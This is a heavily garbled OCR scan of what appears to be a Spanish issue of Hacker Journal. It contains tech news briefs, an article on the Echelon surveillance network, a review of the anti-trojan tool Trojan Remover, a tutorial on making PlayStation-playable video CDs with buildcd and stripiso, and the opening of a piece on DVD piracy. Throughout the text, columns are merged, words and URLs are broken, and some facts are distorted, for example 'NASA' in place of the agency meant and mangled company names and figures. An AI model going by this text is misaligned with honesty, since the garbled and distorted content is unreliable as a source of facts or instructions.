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hacker (hák'ar) “Persona 


e se divierte explorando los 
detalles de los sistemas de programación y expandiendo sus 
capacidades, a diferencia de muchos usuarios, que prefieren 
aprender solamente el mínimonecesario.” ei 


¿Estáis de acuerdo? 


Su 
een 


DECIRNOS [QUE [PENSÁIS [DE [HJ 
iPodéis contactar con todos los redactores 
vía e-mail: felicitadnos, criticadnos, enfa- 


daros pero ante todo 


CONTACTAR [CON [NOSOTROS!' 


redaccionoOhackerjournales.com 


UNA REVISTOA ARA TODOS 


( s cosas simples y otras complica- 
das. curiosos, encia J, expertos para los cuales el 
ordenador no tien iculo de Hacker Journal viene mar- 
cado con una con ña para cada nivél: NEWBIE (para quien comien- 
za), MIDHACKIN ra quién ya está adentro) y (para 
quien come pan rm). .: 


todo 


Hasta al oróximo mas an los quioscos] 
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S AOL TIME WARNER POR LOS SUELOS 
de criatura nacida de la fusión del celebre 
proveedor estadounidense con el gigante AQL 
del media esta sufriendo algunos golpes, por 
usar un eufemismo. 
Las perdidas relativas al 2002 rozan los 100 
millones de dólares, un número significativo 
también por las grandes cifras en el aire del 
mercado financiero americano, A este daño 
le sigue el “modesto” pasivo del 2001, que 
era de “apenas” 5 millares de dólares, y las 
renuncias de los mas altos vértices de la 
dirigencia, entre ellos el guru del media Ted 
Turner, quien era el vise director. 


TIME WARNER 


S OPERA 7 LLEGA A WINDOWS E 


sta finalmente disponible la versión 

E: Opera 7, que tiene todas las 

> serias intenciones de bajar del trono a 

€ Explorer. Más veloz, más ligero y 

funcional: estas son las premisas de los 

productores del popular browser 

“alternativo”, que las estadísticas lo ven en el 

tercer lugar entre los browser mas difundidos en 
el mundo. 

La subida de Opera tiene una sola nube en su 

horizonte: Safari, el nuevo browser de Apple que podría 

superar o quitar del todo del mercado una de las flores al 
ojal de Opera, la versión para Mac. 

Una de las novedades mas interesante es la Spatial 
Navigation, un verdadero método de navegación al interno 
de una pagina mediante Shift y las flechas. El browser está 

disponible (gratuitamente in versión hardware, o a 39 dólares 

sin banner) a través de www.opera.com. 


2 COLABORAR ES UN CRÍMEN 


n técnico informático estadounidense que 
us a disposición algunas maquinas de la 
red escolar que estaban a su cargo para un 
proyecto de “distributed computing”, como el 
citado SETIGCHOME, un proyecto que permite 
utilizar los recursos de una computadora a 
través de la Red, cuando ésta se encuentra 
inactiva, para efectuar cálculos complejos. La 
acusación no es leve: hurto de recursos 
informáticos y violación de la seguridad, por 
haber instalado un software de terceras 
personas. Siendo la pena acumulativa por cada 
computadora en que fue hecha la modificación, 


se llega a la estupefaciente suma de 120 años. — por tal norma. 
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Incluso se ha probado llegar a una tentativa de 
remuneración de 415.000 dólares, que sería el 
costo de la banda total ocupada por los clientes, 
petición hasta ahora denegada. Obviamente con 
referencia a este caso se desató una gran 
polémica. La culpa viene atribuida a la rigidez de 
las leyes estadounidenses en materia de 
seguridad informática, hechas en forma 
rudimentaria que crean grandes limitantes, 
come esta. Lo absurdo de la acusación es la 
instalación ilícita de software de terceras 
personas en un ambiente como el universitario, 
donde se ven violaciones continuas y toleradas 


2  DOCUMENTI 
FIRMATI 


icrosoft esta en proceso de otorgar 
Mu actualización para Word 2000 e 
2002 (Xp para entendernos), que 
consentirá la aplicación de la firma 
electrónica a los documentos creados por 
el popular editor. Un servicio útil y una 
maniobra cautivante de parte de Redmond, 
visto que ningún ente público podrá 
prescindir de dotarse de un instrumento de 
elaboración de texto que soporte tales 
funcionalidades. 
Como decir: en un futuro próximo, nada de 
concursos públicos para abastecerse de 
software sin el soporte de la firma digital. 
Es la hegemonía de Microsoft, ya minada 
de Linux al insinuarse entre los entes 
públicos, que quizás no pueda soportar un 
nuevo daño. 
Pero tampoco las empresas o los libres 
ciudadanos que tienen la necesidad de un 
diálogo regular, tal vez por vía telemática, 
con la estructura pública no podrán (o 
querrán, porque no) hacer de menos al 
soporte de la firma digital. Una 
especificación que es importante hacer: 
dadas las características intrínsecas de la 
firma electrónica, a veces para garantir la 
autenticidad, así como también la 
integridad de un documento, todos los 
documentos que presentes partes activas, 
como macros, se convertirán en 
“estáticos” y salvados en copia por la 
firma, sin afectar al original ni invalidar la 
validez de la firma electrónica. 


3  LAZETA JONES 
ES UN VIRUS 


o nos referimos a la sensual actriz en 
MWieamo y hueso, sino al ya tan difuso 
worm que promete el acceso exclusivo a 
fotografías sin velo de la susodicha y de 
otras divas del momento, como Shakira y 
Britney Spears. Haciendo clic en ligas 
falsas, aparte de no ver ninguna foto 
picante, ya de por si motivo de desilusión, 
se activa el virus W32/igloo-15, que instala 
una backdoor en el sistema, abriendo una 
vía de ingreso a simples curiosos 0 
malintencionados varios. 


= ESPIONAJE .m M-= 


UN SISTEMA DE INTERCEPTACIÓN “GLOBAL” 


Si pensáis que vuestro 
portero es el medio más 
eficaz para obtener 
informaciones, tenéis 
que saber que no es así: 
existe un sistema de 
interceptación de datos 


eficiente que 1.000 
porteros juntos, quizá 
incluso que más de 2000. 


|xiste un Gran Hermano? 

7 | Y si es si, es más pareci- 

do al conjeturado por 

-— |George Orwell en 1984 

o al de Pedro y compa- 

a Jñía? la pregunta tiene 

una respuesta muy precisa: el “Gran 
. | Hermano”, capaz de controlarlo todo y |, 

de vigilarnos'a todos, existe. Se llama 

Echelon y llega a nuestras casas infil- 

trándose por entre los pliegues de nues- 
tra vida privada. 


Siempre se ha temido y hablado de la | 
existencia de un sistema de intercepta- 
ción global, pero el primero que nos 
trajo pruebas que revelaban su existen- 
cia fue un periodista, Duncan 
Campbell, en un artículo titulado “Bi 
Brother is listening”, publicado en el 
New Statesman de Londres en 1981. 
Desde entonces, a lo largo de los años, | 
han ido apareciendo nuevas pruebas | 
, [que han 
¡más precisa la estructura de Echelon. En 
particular, podemos encontrar pruebas 
de su existencia en un libro publicado en | 
11996: Secret Power, en el que el autor, | 


efinido de forma. cada. vez |, 


Nicky Hager, cita numerosas declaracio- 
nes recogidas en las entrevistas de cerca 
de 50 personas implicadas en los servi- 
cios secretos, que trabajaban o habían 
trabajado por la más importante agen- 
cia de inteligencia de Nueva Zelanda, 
Security Bureau (GCSB). Yes, preci- 
samente, Nueva Zelanda uno de los 
países que ha contribuido en mayor 
medida al nacimiento de Echelon. Este 
se apoya en un pacto denominado 
UKUSA Strategy Agreement que fue rati- 
ficado en 1948 y en el que se adhirieron 
la National Security Agency estadouni- 
dense, el Government Communications 
Headquarters (GCHQ) británico, la 
Communications er Establishment 
CSE) canadiense y el Defense Signals 
irectorate (DSD) australiano. En base a 
los acuerdos, los estados miembros 
cooperarían para desarrollar un sistema 
de espionaje global, diseñado por la 
SA, cuyo nombre inicial fue 
“Proyecto-415”, después modificado 
or el de Echelon. 
chelon es un sistema muy complejo 
para interceptar cualquier forma de 
comunicación: desde la llamada telefó- 
nica al e-mail, pasando por el fax, etc. 
Nada escapa. 
Echelon es global por su capacidad de 
controlar la comunicación entre perso- 
nas de distintos países que intercam- 


ECHELON 


bian informaciones pero también den- 
tro de un mismo país, de hecho, en 
todas ¡las partes del mundo. Aunque 
haya nacido y se haya desarrollado en 
un período de “guerra fría” sus objetivos 
no son en primera instancia objetivos 
bélicos, quizá si lo fueron en una pri- 
mera fase embrionaria de su desarrollo, 
pero hoy en día sirve, sobretodo a los 
países implicados en el proyecto, para 
ejercer un control global en todo aque- 
llo que sucede y para filtrar, interceptar 
y catalogar millones de informaciones 
reservadas. Echelon no ha sido diseña- 
do para espiar un e-mail particular o un 
usuario fax específico. Al contrario, el 
sistema trabaja interceptando de forma 
indiscriminada una enorme cantidad de 
comunicaciones, y a través del uso del 
ordenador, es capaz de filtrar las infor- 
mociones y extraer aquéllas que consi- 
dera interesantes: fragmentos de datos 
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recogidos entre millones de informacio- 
nes con una precisión casi quirúrgica. 
Echelon está organizado, en suma, 
como una cadena de estructuras de 
interceptación distribuidas por todo el 
imundo para examinar en el fondo la 
red de telecomunicaciones global. 
Algunas estructuras controlan los satéli- 
tes de comunicaciones, otras las net- 
work por tierra y otras las comunicacio- 
nes por radio. Echelon conecta todas 
estas estructuras permitiendo, a los 
Estados Unidos y a sus aliados, inter- 
ceptar una gran cantidad de las comu- 
nicaciones que se efectúan en el plane- 
ta. Los ordenadores puestos en cada 
estación del sistema ECHELON 


anteriormente 
introducidas. Las keywords, incluyen 
elementos que pueden tener una rele- 
vancia cualquiera: nombres, poblacio- 
nes, asuntos, pero también palabras 
aparentemente “peligrosas” o extrañas 
ue puedan hacer sospechar un sistema 
do mensajes con algún tipo de código. 
Cada palabra de cada mensaje inter- 
ceptado es escaneada automáticamen- 
te sea cual sea la fuente de la cual pro- 
venga. Los millares de mensajes simul- 
táneos son leídos en “tiempo real” tal 
como llegan a las estaciones, y los 
ordenadores consiguen encontrar la 
aguja escogida por los intelligence en el 
pajar de las telecomunicaciones. Los 
ordenadores en las estaciones distribui- 
das por todo el mundo, en el interior del 
network, tienen el nombre los 
“Diccionarios”. 


La existencia de ordenadores como los 
“Diccionarios” no es una novedad, ya 
habían sido usados durante la guerra 
fría, pero representaban unidades indi- 
viduales y autónomas no comunicantes 
entre sí. La novedad de Echelon ha sido 
la de crear una Network perfectamente 
integrada donde los ordenadores indivi- 
duales dialogan con todos los otros y 
son capaces no sólo de intercambiar 
informaciones, sino también de utilizar 
la lista de keywords elaborada por cada 
país miembro. De hecho, las estaciones 
de los aliados menores de la alianza 
funcionan para la NASA como si fueran 
bases fuera del territorio estadouniden- 
se. Cada una de las estaciones donde 
se encuentran los “Diccionarios” posee 
un nombre en código que la distingue 
de las otras de la A Estos nombres en 
código son registrados al inicio de cada 


mensaje interceptado antes de que 
sea distribuido a través de la red de 
Echelon, y permiten así, al analizador 
localizar rápidamente qué estación ha 
hecho l'interceptación. Posteriormente 
otro componente del sistema Echelon 
intercepta una serie de comunicacio- 
nes por satélite no vehiculadas por el 
sistema “intelsat”. Y más tarde, un sis- 
tema de estructuras para explorar las 
comunicaciones por tierra: represen- 
tan el elemento final del sistema. Son 
también, obviamente, un objetivo 
ara las interceptaciones a gran esca- 
a de los tradicionales sistemas de 
comunicación nacionales entre las 
personas, y naturalmente tampoco 
esto escapa a Echelon que aprovecha 
de esta gran vía de transmisión de 
datos para efectuar controles al 
mismo tiempo en un flujo de informa- 
ción absolutamente gigantesco. Las 
informaciones previsibles sobre el sis- 
tema Echelon se encuentran en el sitio 
de la Las 
más delicadas os las damos nosotros. 
Echelon es, de una parte, un sistema 
de vigilancia, un método preventivo 
para conjurar acontecimientos crimi- 
nales, y hasta aquí no hay nada de 
malo en ello. Pero usado de forma 
incorrecta (admitiendo que meter las 
narices en nuestros asuntos sea Un 
comportamiento legítimo), puede ser 
un instrumento capaz de conceder 
ventajas injustificadas a los países que 
forman parte del proyecto, sobretodo 
a Estados Unidos. Con Echelon se 
pueden determinar las negociaciones 
comerciales. El Sunday Times hace 
algún tiempo se refirió a un caso en el 
que la sociedad de intermediación 


francesa, Thompson CSF, perdió un 
contrato de 
con el cual pretendía abastecerse 
de un sistema radar en el Brasil. Las 
negociaciones fueron interceptadas 
or Echelon y la sociedad americana 
Ravibaon pudo conocer todos los ele- 
mentos de la negociación y aprovechó 
para “dar un tirón” proponiendo, pre- 
sumiblemente condiciones mejores, el 
encargo a la sociedad francesa. Es 
evidente que ésto es un juego sucio: 
un poco como participar en una ofer- 
ta para ganar un concurso, con los 
sobres sellados, conociendo anticipa- 
damente las ofertas de los concursan- 
tes. Pero este es sólo uno de los 
muchos casos que se dan. ¿se puede 
escapar a Echelon? De nada sirve 
hacer utilizar un código para nuestros 
documentos ya que el sistema es 
capaz de detectar aquellos que utili- 
zan o son sospechosos de utilizar 
algún tipo de código y separarlos de 
la marea de comunicaciones como 
elementos sensibles. 
Sin duda alguna, lleva un poco más 
de tiempo dar todas las instrucciones, 
pero vale la pena perder algunos 
minutos: probablemente si unos 
cuantos millones de internautas se 
pusieran a enviar al mismo tiempo 
documentos en código el sistema se 
bloquearía inexorablemente: pero 
esto es improbable. Quizá el único 
sistema es volver a los métodos tradi- 
cionales que no requieren ninguna 
tecnología: palomas mensajeras, 
correspondencia escrita y quizá algún 
emisario que transporte nuestro men- 
saje cerrado con lacre, a la cara de 
Matrix. 


UN PROGRAMA UTIL PARA QUITAR LOS CABALLOS DE TROYA. 


caballería Troyan 


¿Queréis verificar si en vuestro sistema está presente .—..buw 
un caballo de Troya o igual no conseguís eliminar uno que ya habéis 
encontrado? Quizás Trojan Remover es el programa para vosotros. 


uy a menudo la pala- 
bra virus es utilizada 
de manera impropia 
para definir cualquier 
código o programa que pueda resul- 
tar dañino. Pero hay unos cuantos 
que, como los caballos de Troya (tro- 
jans) no tienen nada que ver con los 
“verdaderos” virus, por que se trata 
en realidad de programas disfrazados 
de aplicaciones inocuas (juegos, uti- 
lity, screen saver etc.) pero capaces 
de hacer daños graves. 
La mayoria de los antivirus modernos 
tienen la posibilidad de reconocer los 
caballos de Troya mas conocidos, 
aunque solo pocos de ellos pue- 
dan eliminar todos los rastros en 
un sistema contaminado por es- 
tos programas molestos. 
Sin embargo también existen unas 
herramientas del sistema llamadas 
antitrojans cuya tarea es de individuar 
y quitar aplicaciones como los troya- 
nos, aprovechando de un enorme da- 
tabase actualizable vía Internet, anali- 
zando los ficheros de sistema, registro 
incluido, y controlando los procesos 
activos. 


¿Por qué Troyan? 


esto porque hay muchas varie- 
dades de ataques posibles contra una 
maquina Windows. Desde luego, el 


crecimiento exponencial de las lineas |. 


de codigo en los sistemas operativos o 
en los programas en general, provo- 
ca un consecuente aumento del nu- 
mero de “grietas” explotables por 


cualquier ataque. 

De todos modos, la intención sigue 
siendo la misma: acceder a los recur- 
sos de sistema sin que el legi- 


entes. 
e Start Group. 
ring ret SIA GI0Ups 
Checking Services File, 
Checking Autossec.! 
Closing Scan Log 


Crec Pega 
e STEIN 
Scanring Regist 
Scanring Active Setup. 
Serving NT/XP Services 


Y Yentos | 


e sentido, la opción más 
mple es la de instalar un pro- 


grama capaz de garantizar un 


ceso completo, abriendo vías 
E comunicación que explotan 
És archivos de sistema desti 
dis a la comunicación TCP/IP llama 
Sas winsocket. 

ada lenguaje puede ser utilizado 
para crear una pequeña arquitectura 
Client/Server. No es por casualidad 
que casi cada día se desarrollan pro- 
gramas en Delphi como en Visual 
Basic así como en el más complejo 
C/C++, tal que parece que los po- 
demos considerar como “ejercicios 
de estilo”. 

En estos casos no basta solamen- 
te actualizar frecuentemente el 
database del antivirus por que 
los troyanos se reproducen mucho 
mas deprisa que los virus y entonces 
siempre hay muchas posibilidades 
que el sistema esté contaminado por 
un software no reconocido correcta- 
mente. 
De hecho, son programas disponi- 


bles en leng diferentes, y enton- 
ces resulta 1 cil para un progra- 


mador estudiar el codigo y crear nue- 
vos troyanos. 


>> Trojans remover 


Entre los programas que pueden ayu- 
darnos a defendernos de este peligro 
hay Trojan remover, un programa que 
no solamente ejecute el scanning del 
disco duro sino el del sistema en ge- 
neral. TR puede ser descargado 
gratuitamente, entre los otros (hay 
muchos) desde la web de la software 
house que lo ha desarrollado, la 
Simply Super Software www.simply- 
sup.com/tremover. 

Las plataformas por las cuales el TR 
ha sido creado son la de la familia 
Windows 9.x/Me/NT y XP aun si ha si- 
do utilizado con eficacia también en 
entorno Win2000., 

Una vez acabado el procedimiento 
habitual de instalación se puede ini- 
ciar el programa: aparece pronto una 
interfase de entrada que no; 
queremos registrarnos para 

el producto. 

Es importante decir que TR no pide al- 
gún ajuste particular para poder fun- 
cionar de manera correcta y comple- 
ta. TR puede cumplir operaciones va- 
riadas, como escanear los ficheros 
de registro, hasta analizar los 
ficheros y los programas que se 
cargan cada vez que se enciende 
el aparato. 

Cada vez que TR individuare un caba- 
llo de Troya o un programa non iden- 
tificado aparecerá una ventana de 
pop-up que muestra la situación y el 
nombre del file. En este punto el pro- 


grama ofrecerá la posibilidad de 
| quitar el intruso y renombrarlo 
| para que no se pueda cargar más. 

Desgraciadamente muchos troyanos 
tienen la capacidad de activarse cuan- 
| do Windows se inicia, y su renombra- 
“cion se hace más difícil. En consecuen- 
cia TR puede reiniciar el sistema y 
renombrar los 


[ELA 

ficheros dañinos 
antes que Windows entre en fun- 
ción. 
Con esta opción todos los ficheros se 
ajustan en “solo lectura” así que se 
previene una nueva infección. Cuan- 
do acaba la procedura de inicio, los 
parámetros de solo lectura se han 
quitado. 


El escaneo del sistema se puede fácil: 
mente iniciar desde la interfase princi- 
pal utilizando el botón apropiado. La 
primera vez que se efectúa esta opera- 
ción, TR pedirá de seleccionar las ex- 
tensiones de los ficheros que se quie- 
ren analizar, « recordando » vuestra 
respuesta para los escaneos futuros. 

De todos modos no son necesarios co- 
nocimientos particulares, por que el 
programa ya ofrece en default unas 
cuantas opciones su-| 
ficientes. l 
Si se quieren hacer | 
modificaciones solo | 
hay que clicar sobre| 
“Options” desde la| 
ventana “Drive/Di- [h 
rectory Scan”, que 

va a las preferencias sobre los ti- 
pos de ficheros que se quieren analizar. 
El escaneo puede ser interrumpido en 
cualquier momento, impidiendo a TR 


de hacer cualquiera acción correctiva 
sobre los eventuales ficheros que se 
han encontrado infectados. Si lo de- 
jamos terminar, al contrario, será po- 
sible visualizar los ficheros de log con 


una especie de índice de las opera- | 1 


ciones cumplidas. 


La barra de las aplicacio- 
nes de la interfase principal 
pone además a disposi- 
ción, a través del botón 
identificado con la antorcha 
pequeñita, la posibilidad de ejecutar 
otros tipos de escaneos. Estos esca- 
neos pueden ser de carpetas 
singulares o de drives enteros, se- 
leccionados de la misma ventana 
“Drive/Directory Scan”, que además 
muestra un menú para elegir el tipo 
de operación que TR efectuará si en- 
cuentra un caballo de Troya. 

Las opciones posibles son la renom- 
bración automática del fichero 
infectado (al menos que no se en- 
cuentre en un archivo zip, en este ca- 
so el usuario tiene que intervenir di- 
rectamente) o, la más simple ano- 
tacion en el fichero de log, del 
recuento del escaneo. Está previs- 
to además la puesta en pausa de ca- 
da file que contenga un troyano, o 
simplemente sospechoso, para per- 
mitir de tomar cada vez la mejor de- 
cisión. 

De todo modo está bien de acordar- 
se que tomando la decisión de 
eliminar un file con TR se cum- 
ple una acción irreversible por 
que el objeto será quitado sin 
ser desplazado a 
= la papelera de re- 
ciclaje. 
lUna función muy 
practica y cómoda 
Ilse encuentra en la 
posibilidad de efec- 
Htuar los mismos tipos 
de scanning directamente desde 
Windows Explorer, cliqueando sim- 
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nm E 


plemente con el botón derecho del ra- 
tón después de la selección del fiche- 
ro o de la carpeta. 

Si durante el funcionamento de TR 

os dais cuenta 


'É button. 


y cal 


w* 


A 


y a 


Ñ 


1 include files already 10 


450) 
de la creación 
de carpetas en el directorio de di- 
rectorios temporaneos de Windows 
(CAWindowsYlempWY no teneis que 
preocuparos, es normal. Estas carpe- 
tas seran quitadas automaticamente 
en poco tiempo. Las otras funciones 
de la interfase principal permiten un 
acceso rapido a los files log y a sus 
impresiones , la habilitación al esca- 
neo de inicio como dicho antes y a la 
visualisación de el database de lo tro- 
yanos conocidos. | 


ucha gente esta convir- 
tiendo en Video CD 
sus filmaciones; 
A parte de ser un siste- 
ma de archivado fiable 
(mejor que videocasete 
VHS), un Video CD se puede leer en 
DVD y sobretodo se visualiza en te- 
levisión. 
Este aparato demuestra ser mejor 
que un monitor para PC, especial- 
mente por su tamaño más pequeño. 
¿Si no tengo DVD/Video CD, pero me 
queda una de esas antiguas PlayStation? 
Con un poco de ingenio y una pizca de pa- 
ciencia, se puede crear un Video CD repro- 


«ducible con la querida Psx. 


Ante todo veamos que nos sirve: 


' 
m d h á 


IN NA 


builded.exe, programa DOS para crear una 
“pre-imagen” de CD a partir de un file CTI 
stripiso.exe, programa DOS para convertir 
el file creado con BuildCD al formato 

ISO, Hitlice.exe, programa DOS que modi- 
fica la imagen obtenida para volverla viable 
en Playstation. El paquete Video4.zip, que 
se descarga desde la dirección indicada en 
los links, además de contener los progra- 
mas citados, contiene los siguientes fi- 
les:2352.DAT, file que contiene datos fun- 
damentales a añadir a la imagen cread con 
StripISO para permitir al CD de ser leído 
por la PS; grabba.cti, file de tipo CTI: descri- 
be la estructura de los files y del directorio 
que constituirán nuestro CD, y contiene 
varias informaciones sobre el modo en el 
cual la imagen del CD se ha creado con 
BuildCD (el formato se explica mas allá 
en este documento).  Config.dat, 
system.cnf psx.exe, estos son los file del 
sistema del CD. 


Un CD para PS tiene una estructura muy 
particular. Ya sea por los files que contie- 
ne, sea por el modo en el que se ha gra- 
bado. ¡ 
-los files 
Por default, la Play al encender, busca en 
el CD el file Psx.exe y lo ejecuta. En el fi- 
le system.cnf, es posible especificar un 
nombre diferente para el file de inicio, 
además de otros parámetros que por el 
momento no nos interesan. 

En un CD “básico” para la PlayStation 


hay también un file config.dat. El file de- 


be tener una estructura diversa según 
que la Play sea utilizada con sistema PAL 
(europeo) o NTSC (norte americano). En 
el paquete Video4.zip hay 2 ejecutables, 
Psxntsc.exe y Psxpal.exe: es necesario re- 
nombrar como Psx.exe el que uno quie- 


un simple pro- | 
grama que vi- | 
sualiza un fondo 
(personabilisa- 
ble) en el cual se | 
ven cuatro iconos | 
(personabilisa- +=" 
bles) : seleccionando cada uno, verá la 
película de cada uno. 

-La imagen ISO 

Usar un programa “normal” (Como Easy 
CD Creator, que viene con muchas gra- 
badoras) non es suficiente para crear un 
CD para PS, porque tiene que tener un 
formato muy particular. Es necesario uti- 
lizar los programas listados antes, en el 
párrafo “requisitos” (o otros programas 
equivalentes, que se encuentran en sitios 
especializados). Veamos la sintaxis de 
estos programas: 


buildcd -ivideo.img grabba.cti 


Este comando crea una “pre-imagen” vi- 
deo.img basando se sobre los paráme- 
tros del file grabba.cti. Si abres un file de 
este tipo, verás que inicia y termína con 
códigos mas bien complicados; pero lo 
que nos interesa es la parte central, que 
describe la estructura del directorio del 
CD. Esta parte está delimitada por las pa- 
labras clave “Hierarchy”e “EndHie- 
rarchy”. Dentro, tendremos varios partes, 
una por cada file y por cada directorio; 
las partes para los file van delimitadas 
de “File [filename.suf]” y “EndFile”, mien- 
tras las del directory de “Directory [direc- 
toryname]” y “EndDirectory”. Aquí un 
ejemplo simple de estructura: 


Hierarchy 
Directory PRUEBA 
File file.txt 
XASource PRUEBAAfile.txt 
EndFile 
EndDirectory 
Directory TEST 
EndDirectory 
EndHierarchy 


Pon atención a la palabra clave XASource 
que precede el nombre del file, seguido 
del nombre del file completo del recorri- 


doque tendrá que ha- 
ber en el CD. La pala- 
bra clave sirve a es- 
a TOS 
de tipo XA, por tanto 
tiene una longitud de 
2048 byte; si no la 


a soys tiene, el programa 


BuildCD dará un “warning”, o sea 
una advertencia. Una vez creada la “pre- 
imagen”, hay que “ajustarla” con los da- 
tos relativos al tipo de sistema en el que 
funcionará el CD: europeo, americano o 
japonés; según los casos, a la pre-ima- 
gen se adjuntara un file distinto. En nues- 
tro caso, con este comando 


stripiso 2352 video.img video.iso 
seguido de 
COPY /B 2352.DAT+VIDEO.ISO CD.ISO 


En este punto, nos queda solo a “habili- 
tar” la imagen para funcionar en la PS, 
con el programa Hitlice.exe: una vez 
puesto en marcha , hay que especificar el 
nombre completo del file .ISO de “arre- 
glar”. Ahora la imagen está lista para 
grabar la en el CD... pero no con un pro- 
grama cualquiera como Easy CD Crea- 
tor; se necesita un programa particular 
como BlindWrite o semejante. 

En el paquete se encuentra también un fi- 
le .cue que se utiliza para escribir el CD, 

A pesar de lo que se explica en algunas 
guías en Internet, este file no está creado 
por los programas contenidos en el pa- 
quete Video4.zip, entonces icuidado de 
no borrarlo cuando decidáis borrar las 
imágenes para obtener espacio en el dis- 
co duro! 


Con este sistema solo se pueden ver pelí- 
culas de tipo STR (aunque en teoría se 
podría escribir un programa para Plays- 
tation que lea el formato AVI), por lo cual 
deberéis convertir vuestras películas a es- 
te formato; si se trata de AVI podéis utili- 
zar el programa Movie Converter. Una 
cosa muy importante es que el formato 
de el audio del AVI tiene que ser 
44.100KHz, 16 bit, stereo, no com- 
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http://mikill.interfree.1t/con 
sole/videoM.Z1p 


www-greenspun-com/bboard/ 
q:and:a:Tetch 
msa-tclómsa id=000t SA 


www.» Overinside-com/piratinside/ 
masterino/psxvideo-php 


http://members-xoom.virgilio+1 
t/thematrixpJ/psxvideo-htm 


wwu-.gamefreax-de/toolz.html 


www-overinside.com/piratinside/ 
masteringa/psxvideo-php 


Yww-greenspun-com/bboard/ 
q:and-a-fetch- 
msg-tcl?msg 1d-=000tS4 


WWW -*-epSsXxe+. com 


WWW+»pesx-net/index-shtml 


http://exeat»-com/pse/ceddy/psx/ 
WwWww+psXxfenatics»com/ 


www -ngemu-com/fTorums/shoythrea 
d-php?ssaedcl1ca Hare Md 51Lkb551kb 
eBx2dbb3deathreadid=21379 
http://help-psxfanatics-com/ 
pesxfaq-php 


— O e 


COMO VER EN PLAYSTATION VIDEOS REALIZADOS EN PC 


primido. En cambio, el video puede ser 
comprimido, sin embargo la resolución 
es obligatoriamente de 320x240, que es 
la de la Playstation. Recordad también 
que utilizando Movie Converter para ha- 
cer la conversión, en los parámetros de 
conversión tenéis que seleccionar la casi- 
lla “Leap Sector”, la del audio (que por 
supuesto tiene que estar activo), y ajustar 
el frame rate (Fps) a 25. Según algunas 
guías, al revés, es mejor seleccionar fre- 
cuencia a 15fps; esto da resultados mas 
“seguros” pero con menor calidad, 

Una vez descomprimido el file en un di- 
rectorio (por ejemplo, C:Psx), necesitare- 
mos otros programas: 


er que CO! 
nd 
1 


rte los 
a la e rstation 


zando 
Movie Center para hacer la 
conversión, en los parámetros de conver- 
sión hay que seleccionar la casilla “Leap 
Sector”, la del audio (que tiene que estar 
activo), y ajustar la frame rate (fps) a 25. 
Terminada la conversión, renombrar los 
cuatro files obtenidos en 1.str, 2.str, 
3.str y 4.str; cread un directorio video 
dentro del directorio donde habéis des- 
comprimido los files .zip. y meted den- 
tro los cuatros files .str. 
Ahora poned en marcha en secuencia los 
files Grabba.bat, Grabba2.bat e Pon- 
dat.bat, o cread un file .bat que contenga 
estas tres líneas: 


TimUtil (htta:d/mákill- min- 
terfree.. itáconsole4táimu- 
til*zip) 

NES Emp e en formato Tim y 
viceversa: 


MovieConverter (http://mi- 
kil1l.interfree.it/console/m 
ovconva2 210) Para convertir pelícu- 
las Avi en Str; buildcd -ivideo.img grabba.cti 

stripiso 2352 video.img video.iso 
COPY /B 2352.DAT+VIDEO.ISO CD.ISO 


STRPlay (http://mikill-intenfree. 
it/console/strpalay-zip) 
Para visualizar las películas en formato Str. La ejecución de los los programas puede 
requerir mucho tiempo, si los video son 
demasiado largos; desgraciadamente, 
solo BuildCD muestra el estado de ade- 
lantamiento en porcentaje, los otros pa- 
recen bloquearse. En realidad, solo te- 
néis que esperar; para saber cuanto, te- 
ned en cuenta el tiempo que emplea 
BuildCD en terminar y calcular el mismo 
tiempo por Stripiso y el mismo por Copy. 
Hay que tener paciencia... lerminada la 
ejecución, debéis hacer que la Playstation 
pueda cargar vuestra imagen ISO ; pero 
cuidado, en los emuladores de Playsta- 
tion Epsx (www.epsxe.com php) y Pesx 
(www.pcsx.net) la imagen 
a funciona también sin utili- 
zar Hitlice, pero no funcio- 
na en la Play. 
En este punto, ponéis en mar- 
cha vuestro programa de gra- 
bación (Sobre todo que no sea 
Easy Cd creator 3.5c, por que 
no funciona) y ponéis la imagen 
en un CD, 


También en éste caso podemos utilizar 
otros programas que hagan las mismas 
cosas. Tenéis que descomprimir todos los 
files en el mismo directorio de antes, es 
más cómodo. 

En este punto aseguraos de tener a mano 
los cuatro files Avi que os interesan, y que 
estén todos con audio sin comprimir 
(PCM, 44.100KHz, 16bit, stereo , o sea 
calidad CD) y en formato 320x240; 
abran MovieConverter, y hagan la con- 
versión uno a uno. Como dicho antes, 
utili- 


sy EN mago O Ps 
un: Wei 

iLing Out pur Pilo ' 

% Complete 


BuildCq crea la imagen del disco 
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Cuidado, la Play no puede leer CD-RW si- 
no solo CD-R. Para no quemar inútilmen- 
te CDs, mejor utilizáis emuladores 
Psx como lo de antes. Los dos utilizan 
el sistema de plug-in para funcionar; di- 
cho de otra manera, debeis primero des- 
cargar otras “partes” de programas: los 
de la grafica, los del sonido, los del con- 
troller y lo del CD-Rom, el más importan- 
te. Los otros pueden ser los que sean, pe- 
ro si utilizáis PCSX tendréis que utilizar un 
plug-in que simule el CD por medio de un 
file ISO. Por ejemplo en este caso tenéis 
que utilizar: +p://mo00y. 
psxfanaties.com/cdrmogby201 

wINszI0 


>»Personalizar el 
programa 


Con Epsx, la “simulación de CD” es 
de serie. 

Si habéis hecho todo como se debe, apa- 
recerá la ventana del programa. Podéis 
elegir uno de los cuatros iconos (las teclas 
dependen de cómo habéis configurado el 
emulador de la Play), y veréis mágicamen- 
te aparecer la película en la ventana de la 
Playstation, virtual o real quien sabe. 

El programa de visualización parece muy 
soso, pero ningún problema: la grafica 
se puede cambiar al gusto propio; 
el fondo está en el file Albums.tim en la 
carpeta Resource y los iconos estan en la 
carpeta Icons. Convertirlos en Bmp utili- 
zando Timutil, modificarlos como querdis 
y reconvertirlos en Tim (a 16 bit, absolu- 
tamente!) y empezar de vuelta el procedi- 
miento de creación de la imagen. * lá 


Joshua Falken 
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problema de la 
piratería Parece afli- 
A gir un poco a todos 
á los sectores de la tec- 
nología de consumo. Ya 
: [hace tiempo que asistimos a la polémi- 
“Ica sobre la música distribuida en for- 
mato MP3 y los CDs de audio que son 
fácilmente “duplicados o copiados al 
disco duro para poder compartir sus 
canciones en la red. Pero ahora la alar- 
ma llega a la industria cinematográfica 
y afecta un sector en fuerte expansión, 
el de los DVD video, convertido ya en 
uno de los formatos más pirateados. 
Preocupa a las productoras cinemato- 
aa la eds a de precio de las gra- 
adoras de DVD ya que contribuye a 
aumentar considerablemente el merca- 
do de las falsificaciones. La ecuación es 
simple: a más grabadoras, más copias 
ilegales, y esto equivale a menos bene- 
ficios para Hollywood y compañía. 
